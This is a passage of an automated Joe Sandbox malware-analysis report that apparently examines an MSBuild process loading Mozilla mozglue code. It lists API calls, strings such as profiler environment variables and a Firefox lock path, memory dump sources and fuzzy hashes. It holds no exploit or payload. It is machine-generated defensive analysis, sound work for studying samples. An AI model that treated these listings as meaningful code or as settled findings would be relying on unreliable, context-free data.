                                                                                                                                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5D6D
                                                                                                                                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5D84
                                                                                                                                                                                                                      • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5DA4
                                                                                                                                                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5DC9
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6C8E5DDB
                                                                                                                                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5E00
                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5E45
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2325513730-0
                                                                                                                                                                                                                      • Opcode ID: 9b55805ba846fd582c4d96990745b31b71f5c5e5de9fcd0ef64c3622c57c680f
                                                                                                                                                                                                                      • Instruction ID: 2add44828364593802afde78de540b9f0695430c94fb47ddf035fab46062cfce
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b55805ba846fd582c4d96990745b31b71f5c5e5de9fcd0ef64c3622c57c680f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC418E707043058FDB20DF69C998AAEB7B9EF8E355F14446CE50A9B781EB30E805CB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C8831A7), ref: 6C8BCDDD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                      • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                      • Opcode ID: dcc6f80ad5ba4bdcafc64502ade073a47d5d92d9acca50e05daca51b7a917a88
                                                                                                                                                                                                                      • Instruction ID: d65fdcfde1e02e5fad751308354fa4e4b14769ec0dec046790aefefc839698e6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcc6f80ad5ba4bdcafc64502ade073a47d5d92d9acca50e05daca51b7a917a88
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D3183717452099BEF20AFA9CE45B6E7B75AB41B58F30481DF610FBB81DBB0D5008BA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C88F100: LoadLibraryW.KERNEL32(shell32,?,6C8FD020), ref: 6C88F122
                                                                                                                                                                                                                        • Part of subcall function 6C88F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C88F132
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000012), ref: 6C88ED50
                                                                                                                                                                                                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C88EDAC
                                                                                                                                                                                                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C88EDCC
                                                                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 6C88EE08
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C88EE27
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C88EE32
                                                                                                                                                                                                                        • Part of subcall function 6C88EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C88EBB5
                                                                                                                                                                                                                        • Part of subcall function 6C88EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C8BD7F3), ref: 6C88EBC3
                                                                                                                                                                                                                        • Part of subcall function 6C88EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C8BD7F3), ref: 6C88EBD6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C88EDC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                      • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                      • API String ID: 1980384892-344433685
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C8FA565
                                                                                                                                                                                                                        • Part of subcall function 6C8FA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8FA4BE
                                                                                                                                                                                                                        • Part of subcall function 6C8FA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8FA4D6
                                                                                                                                                                                                                      • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C8FA65B
                                                                                                                                                                                                                      • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C8FA6B6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                                                                      • String ID: 0$z
                                                                                                                                                                                                                      • API String ID: 310210123-2584888582
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.MOZGLUE(?,6C90008B), ref: 6C887B89
                                                                                                                                                                                                                      • free.MOZGLUE(?,6C90008B), ref: 6C887BAC
                                                                                                                                                                                                                        • Part of subcall function 6C8878C0: free.MOZGLUE(?,6C90008B), ref: 6C887BCF
                                                                                                                                                                                                                      • free.MOZGLUE(?,6C90008B), ref: 6C887BF2
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8A5EDB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: memset.VCRUNTIME140(6C8E7765,000000E5,55CCCCCC), ref: 6C8A5F27
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8A5FB2
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$CriticalSection$EnterLeavememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3977402767-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C8C946B
                                                                                                                                                                                                                      • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C8C9459
                                                                                                                                                                                                                      • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C8C947D
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                      • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                      • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D0F6B
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8D0F88
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D0FF7
                                                                                                                                                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6C8D1067
                                                                                                                                                                                                                      • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C8D10A7
                                                                                                                                                                                                                      • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C8D114B
                                                                                                                                                                                                                        • Part of subcall function 6C8C8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C8E1563), ref: 6C8C8BD5
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8D1174
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8D1186
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
• Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2803333873-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,?,?,6C891999), ref: 6C88EA39
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C88EA5C
                                                                                                                                                                                                                      • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C88EA76
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(-00000001,?,?,6C891999), ref: 6C88EA9D
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C891999), ref: 6C88EAC2
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C88EADC
                                                                                                                                                                                                                      • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C88EB0B
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C88EB27
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 706364981-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B6AC
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B6D1
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B6E3
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B70B
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B71D
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C88B61E), ref: 6C88B73F
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B760
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C88B61E,?,?,?,?,?,00000000), ref: 6C88B79A
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1394714614-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(6C905104), ref: 6C88EFAC
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C88EFD7
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C88EFEC
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C88F00C
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C88F02E
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?), ref: 6C88F041
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C88F065
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE ref: 6C88F072
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1148890222-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C8FB5B9
                                                                                                                                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C8FB5C5
                                                                                                                                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C8FB5DA
                                                                                                                                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C8FB5F4
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8FB605
                                                                                                                                                                                                                      • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C8FB61F
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6C8FB631
                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8FB655
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1276798925-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6C8E7ABE), ref: 6C89985B
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C8E7ABE), ref: 6C8998A8
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000020), ref: 6C899909
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C899918
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C899975
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1281542009-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C8DCC83,?,?,?,?,?,?,?,?,?,6C8DBCAE,?,?,6C8CDC2C), ref: 6C89B7E6
                                                                                                                                                                                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C8DCC83,?,?,?,?,?,?,?,?,?,6C8DBCAE,?,?,6C8CDC2C), ref: 6C89B80C
                                                                                                                                                                                                                      • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C8DCC83,?,?,?,?,?,?,?,?,?,6C8DBCAE), ref: 6C89B88E
                                                                                                                                                                                                                      • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C8DCC83,?,?,?,?,?,?,?,?,?,6C8DBCAE,?,?,6C8CDC2C), ref: 6C89B896
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 922945588-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C8C4AB7,?,6C8843CF,?,6C8842D2), ref: 6C8C4B48
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,80000000,?,6C8C4AB7,?,6C8843CF,?,6C8842D2), ref: 6C8C4B7F
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C8C4AB7,?,6C8843CF,?,6C8842D2), ref: 6C8C4B94
                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C8C4AB7,?,6C8843CF,?,6C8842D2), ref: 6C8C4BBC
                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6C8C4AB7,?,6C8843CF,?,6C8842D2), ref: 6C8C4BEE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
                                                                                                                                                                                                                      • String ID: pid:
                                                                                                                                                                                                                      • API String ID: 1916652239-3403741246
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D1D0F
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,6C8D1BE3,?,?,6C8D1D96,00000000), ref: 6C8D1D18
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,6C8D1BE3,?,?,6C8D1D96,00000000), ref: 6C8D1D4C
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D1DB7
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8D1DC0
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8D1DDA
                                                                                                                                                                                                                        • Part of subcall function 6C8D1EF0: GetCurrentThreadId.KERNEL32 ref: 6C8D1F03
                                                                                                                                                                                                                        • Part of subcall function 6C8D1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C8D1DF2,00000000,00000000), ref: 6C8D1F0C
                                                                                                                                                                                                                        • Part of subcall function 6C8D1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C8D1F20
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C8D1DF4
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1880959753-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90E220,?), ref: 6C8EBC2D
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90E220), ref: 6C8EBC42
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,6C8FE300), ref: 6C8EBC82
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(6C90E210), ref: 6C8EBC91
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(6C90E208), ref: 6C8EBCA3
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,6C90E21C), ref: 6C8EBCD2
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8EBCD8
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3047341122-0
                                                                                                                                                                                                                      • Opcode ID: 1bb812bbc9529e87cf87523f9e73f2768161cabaf3634d96b8861665a1bd116b
                                                                                                                                                                                                                      • Instruction ID: 8cc72004a38cd48df3fc3e9fe019ad644a8a6103976ed31250152a9e6c6fe5bf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bb812bbc9529e87cf87523f9e73f2768161cabaf3634d96b8861665a1bd116b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8121F172604704CFE3308F49CA80B66B7B8BF46718F15882DE4295BA10CB31E846CBD4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90E220,?,?,?,?,6C893899,?), ref: 6C8938B2
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90E220,?,?,?,6C893899,?), ref: 6C8938C3
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,6C893899,?), ref: 6C8938F1
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C893920
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C893899,?), ref: 6C89392F
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C893899,?), ref: 6C893943
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C89396E
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3047341122-0
                                                                                                                                                                                                                      • Opcode ID: 14a2fbba6d41ebecdc38863fa37bcab12cbbb76ef9301896073169798fd300fe
                                                                                                                                                                                                                      • Instruction ID: e53138a4851c2a9f26168b9a8bdcedb8fbbaa8babb92e1f459af856cbb7f17de
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14a2fbba6d41ebecdc38863fa37bcab12cbbb76ef9301896073169798fd300fe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF21B172600620DFD730DF19C980B96B7A9EF46328F258829D95EA7B11C731FD85CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C84F3
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C850A
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C851E
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C855B
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C856F
                                                                                                                                                                                                                      • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C85AC
                                                                                                                                                                                                                        • Part of subcall function 6C8C7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C8C85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C767F
                                                                                                                                                                                                                        • Part of subcall function 6C8C7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C8C85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C7693
